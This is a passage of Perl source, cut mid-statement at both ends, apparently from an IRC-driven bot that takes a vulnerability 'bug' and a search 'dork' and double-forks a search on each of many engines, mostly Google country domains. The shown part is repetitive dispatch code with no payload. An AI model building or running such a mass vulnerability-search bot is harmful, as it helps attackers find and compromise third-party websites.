} else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKPK",$type,$nick); } exit; } } if ($engine =~ /jackpa/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKPA",$type,$nick); } exit; } } if ($engine =~ /jackpy/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKPY",$type,$nick); } exit; } } if ($engine =~ /jackpe/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKPE",$type,$nick); } exit; } } if ($engine =~ /jackpn/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKPN",$type,$nick); } exit; } } if ($engine =~ /jackpt/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKPT",$type,$nick); } exit; } } if ($engine =~ /jackpr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKPR",$type,$nick); } exit; } } if ($engine =~ /jackqa/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKQA",$type,$nick); } exit; } } if ($engine =~ /jackrw/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKRW",$type,$nick); } exit; } } if ($engine =~ /jacksh/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKSH",$type,$nick); } exit; } } if ($engine =~ /jacksm/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKSM",$type,$nick); } exit; } } if ($engine =~ /jacksa/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKSA",$type,$nick); } exit; } } if ($engine =~ /jacksn/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKSN",$type,$nick); } exit; } } if ($engine =~ /jacksc/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKSC",$type,$nick); } exit; } } if ($engine =~ /jacksg/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKSG",$type,$nick); } exit; } } if ($engine =~ /jacksk/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKSK",$type,$nick); } exit; } } if ($engine =~ /jackza/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKZA",$type,$nick); } exit; } } if ($engine =~ /jacklk/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKLK",$type,$nick); } exit; } } if ($engine =~ /jackvc/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKVC",$type,$nick); } exit; } } if ($engine =~ /jackse/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKSE",$type,$nick); } exit; } } if ($engine =~ /jackch/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKCH",$type,$nick); } exit; } } if ($engine =~ /jacktw/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKTW",$type,$nick); } exit; } } if ($engine =~ /jacktj/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKTJ",$type,$nick); } exit; } } if ($engine =~ /jackbs/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKBS",$type,$nick); } exit; } } if ($engine =~ /jackto/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKTO",$type,$nick); } exit; } } if ($engine =~ /jacktt/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKTT",$type,$nick); } exit; } } if ($engine =~ /jacktr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKTR",$type,$nick); } exit; } } if ($engine =~ /jacktm/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKTM",$type,$nick); } exit; } } if ($engine =~ /jackvi/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKVI",$type,$nick); } exit; } } if ($engine =~ /jackug/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKUG",$type,$nick); } exit; } } if ($engine =~ /jackuy/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKUY",$type,$nick); } exit; } } if ($engine =~ /jackuz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKUZ",$type,$nick); } exit; } } if ($engine =~ /jackve/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKVE",$type,$nick); } exit; } } if ($engine =~ /jackvn/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKVN",$type,$nick); } exit; } } if ($engine =~ /jackzm/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKZM",$type,$nick); } exit; } } if ($engine =~ /jackmuseum/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKMUSEUM",$type,$nick); } exit; } } if ($engine =~ /googleuk/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleUK",$type,$nick); } exit; } } if ($engine =~ /googlebr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleBR",$type,$nick); } exit; } } if ($engine =~ /googleru/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleRU",$type,$nick); } exit; } } if ($engine =~ /googlenet/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleNET",$type,$nick); } exit; } } if ($engine =~ /googleit/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleIT",$type,$nick); } exit; } } if ($engine =~ /googlecom/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleCOM",$type,$nick); } exit; } } if ($engine =~ /googleorg/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleORG",$type,$nick); } exit; } } if ($engine =~ /googlede/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleDE",$type,$nick); } exit; } } if ($engine =~ /googlefr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleFR",$type,$nick); } exit; } } if ($engine =~ /googlecz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleCZ",$type,$nick); } exit; } } if ($engine =~ /googleir/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleIR",$type,$nick); } exit; } } if ($engine =~ /googleme/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleME",$type,$nick); } exit; } } if ($engine =~ /googlecl/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleCL",$type,$nick); } exit; } } if ($engine =~ /googletw/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleTW",$type,$nick); } exit; } } if ($engine =~ /googlese/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleSE",$type,$nick); } exit; } } if ($engine =~ /googleca/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleCA",$type,$nick); } exit; } } if ($engine =~ /googlemx/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleMX",$type,$nick); } exit; } } if ($engine =~ /googlenl/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleNL",$type,$nick); } exit; } } if ($engine =~ /googledk/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleDK",$type,$nick); } exit; } } if ($engine =~ /googleus/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleUS",$type,$nick); } exit; } } if ($engine =~ /googleinfo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleINFO",$type,$nick); } exit; } } if ($engine =~ /googlein/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleIN",$type,$nick); } exit; } } if ($engine =~ /googlemy/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleMY",$type,$nick); } exit; } } if ($engine =~ /googlesk/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleSK",$type,$nick); } exit; } } if ($engine =~ /googletr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleTR",$type,$nick); } exit; } } if ($engine =~ /googleedu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleEDU",$type,$nick); } exit; } } if ($engine =~ /googleno/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleNO",$type,$nick); } exit; } } if ($engine =~ /googleth/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleTH",$type,$nick); } exit; } } if ($engine =~ /googleid/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleID",$type,$nick); } exit; } } if ($engine =~ /googlepl/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googlePL",$type,$nick); } exit; } } if ($engine =~ /googlear/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleAR",$type,$nick); } exit; } } if ($engine =~ /googlees/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleES",$type,$nick); } exit; } } if ($engine =~ /googleve/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleVE",$type,$nick); } exit; } } if ($engine =~ /googlero/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleRO",$type,$nick); } exit; } } if ($engine =~ /googlebiz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleBIZ",$type,$nick); } exit; } } if ($engine =~ /googlecn/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleCN",$type,$nick); } exit; } } if ($engine =~ /googlekr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleKR",$type,$nick); } exit; } } if ($engine =~ /googleza/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleZA",$type,$nick); } exit; } } if ($engine =~ /googlevn/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleVN",$type,$nick); } exit; } } if ($engine =~ /googlesi/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleSI",$type,$nick); } exit; } } if ($engine =~ /googleeu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleEU",$type,$nick); } exit; } } if ($engine =~ /googlebe/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleBE",$type,$nick); } exit; } } if ($engine =~ /googlehu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleHU",$type,$nick); } exit; } } if ($engine =~ /googlelv/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleLV",$type,$nick); } exit; } } if ($engine =~ /googleua/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleUA",$type,$nick); } exit; } } if ($engine =~ /googleie/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleIE",$type,$nick); } exit; } } if ($engine =~ /googletv/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleTV",$type,$nick); } exit; } } if ($engine =~ /googleco/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleCO",$type,$nick); } exit; } } if ($engine =~ /googlepro/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googlePRO",$type,$nick); } exit; } } if ($engine =~ /googlename/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleNAME",$type,$nick); } exit; } } if ($engine =~ /googleby/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleBY",$type,$nick); } exit; } } if ($engine =~ /googleph/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googlePH",$type,$nick); } exit; } } if ($engine =~ /googlejp/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleJP",$type,$nick); } exit; } } if ($engine =~ /googleau/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleAU",$type,$nick); } exit; } } if ($engine =~ /googlecat/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleCAT",$type,$nick); } exit; } } if ($engine =~ /googlehk/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleHK",$type,$nick); } exit; } } if ($engine =~ /googleat/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleAT",$type,$nick); } exit; } } if ($engine =~ /googlesu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleSU",$type,$nick); } exit; } } if ($engine =~ /googlemobi/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleMOBI",$type,$nick); } exit; } } if ($engine =~ /googleasia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleASIA",$type,$nick); } exit; } } if ($engine =~ /googlecoop/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleCOOP",$type,$nick); } exit; } } if ($engine =~ /googlemn/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleMN",$type,$nick); } exit; } } if ($engine =~ /googleae/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleAE",$type,$nick); } exit; } } if ($engine =~ /googlebg/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleBG",$type,$nick); } exit; } } if ($engine =~ /googlenz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleNZ",$type,$nick); } exit; } } if ($engine =~ /googleee/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleEE",$type,$nick); } exit; } } if ($engine =~ /googlegr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleGR",$type,$nick); } exit; } } if ($engine =~ /googlept/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googlePT",$type,$nick); } exit; } } if ($engine =~ /googletn/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleTN",$type,$nick); } exit; } } if ($engine =~ /googleke/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleKE",$type,$nick); } exit; } } if ($engine =~ /googlefi/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleFI",$type,$nick); } exit; } } if ($engine =~ /googlehr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleHR",$type,$nick); } exit; } } if ($engine =~ /googlech/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleCH",$type,$nick); } exit; } } if ($engine =~ /googleil/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleIL",$type,$nick); } exit; } } if ($engine =~ /googlepe/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googlePE",$type,$nick); } exit; } } if ($engine =~ /googlemd/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleMD",$type,$nick); } exit; } } if ($engine =~ /googlecc/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleCC",$type,$nick); } exit; } } if ($engine =~ /googletel/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleTEL",$type,$nick); } exit; } } if ($engine =~ /googleim/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleIM",$type,$nick); } exit; } } if ($engine =~ /googlekz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleKZ",$type,$nick); } exit; } } if ($engine =~ /googleuy/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleUY",$type,$nick); } exit; } } if ($engine =~ /googleqa/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleQA",$type,$nick); } exit; } } if ($engine =~ /googlemil/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleMIL",$type,$nick); } exit; } } if ($engine =~ /googlepk/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googlePK",$type,$nick); } exit; } } if ($engine =~ /googleis/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleIS",$type,$nick); } exit; } } if ($engine =~ /googleuz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleUZ",$type,$nick); } exit; } } if ($engine =~ /googleng/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleNG",$type,$nick); } exit; } } if ($engine =~ /googletravel/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleTRAVEL",$type,$nick); } exit; } } if ($engine =~ /googlesa/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleSA",$type,$nick); } exit; } } if ($engine =~ /googledo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleDO",$type,$nick); } exit; } } if ($engine =~ /googleam/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleAM",$type,$nick); } exit; } } if ($engine =~ /googleeg/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleEG",$type,$nick); } exit; } } if ($engine =~ /googlefm/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleFM",$type,$nick); } exit; } } if ($engine =~ /googlege/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleGE",$type,$nick); } exit; } } if ($engine =~ /googleky/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleKY",$type,$nick); } exit; } } if ($engine =~ /googlelu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleLU",$type,$nick); } exit; } } if ($engine =~ /googlemk/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleMK",$type,$nick); } exit; } } if ($engine =~ /googlesg/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleSG",$type,$nick); } exit; } } if ($engine =~ /googlesy/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleSY",$type,$nick); } exit; } } if ($engine =~ /googlela/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleLA",$type,$nick); } exit; } } if ($engine =~ /googleaz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleAZ",$type,$nick); } exit; } } if ($engine =~ /googlebd/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleBD",$type,$nick); } exit; } } if ($engine =~ /googlecy/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleCY",$type,$nick); } exit; } } if ($engine =~ /googlesn/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleSN",$type,$nick); } exit; } } if ($engine =~ /googlemuseum/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleMUSEUM",$type,$nick); } exit; } } if ($engine =~ /googlegov/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleGOV",$type,$nick); } exit; } } if ($engine =~ /googletk/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleTK",$type,$nick); } exit; } } if ($engine =~ /googlenu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleNU",$type,$nick); } exit; } } if ($engine =~ /googlezm/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleZM",$type,$nick); } exit; } } if ($engine =~ /googleye/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleYE",$type,$nick); } exit; } } if ($engine =~ /googlecu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleCU",$type,$nick); } exit; } } if ($engine =~ /googleto/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleTO",$type,$nick); } exit; } } if ($engine =~ /googletz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleTZ",$type,$nick); } exit; } } if ($engine =~ /googlers/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleRS",$type,$nick); } exit; } } if ($engine =~ /googlepm/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googlePM",$type,$nick); } exit; } } if ($engine =~ /googlelt/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleLT",$type,$nick); } exit; } } if ($engine =~ /googlemz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleMZ",$type,$nick); } exit; } } if ($engine =~ /googlema/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleMA",$type,$nick); } exit; } } if ($engine =~ /googleal/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleAL",$type,$nick); } exit; } } if ($engine =~ /googlepa/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googlePA",$type,$nick); } exit; } } if ($engine =~ /googleec/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleEC",$type,$nick); } exit; } } if ($engine =~ /googlekg/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleKG",$type,$nick); } exit; } } if ($engine =~ /googleuz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleUZ",$type,$nick); } exit; } } if ($engine =~ /googlesv/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"googleSV",$type,$nick); } exit; } } if ($engine =~ /googleCA/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeCA",$type,$nick); } exit; } } if ($engine =~ /googleDE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeDE",$type,$nick); } exit; } } if ($engine =~ /googleUK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeUK",$type,$nick); } exit; } } if ($engine =~ /googleFR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeFR",$type,$nick); } exit; } } if ($engine =~ /googleES/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeES",$type,$nick); } exit; } } if ($engine =~ /googleIT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeIT",$type,$nick); } exit; } } if ($engine =~ /googleNL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeNL",$type,$nick); } exit; } } if ($engine =~ /googleBE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeBE",$type,$nick); } exit; } } if ($engine =~ /googleCH/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeCH",$type,$nick); } exit; } } if ($engine =~ /googleSE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeSE",$type,$nick); } exit; } } if ($engine =~ /googleDK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeDK",$type,$nick); } exit; } } if ($engine =~ /googleNO/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeNO",$type,$nick); } exit; } } if ($engine =~ /googleNZ/i) { if 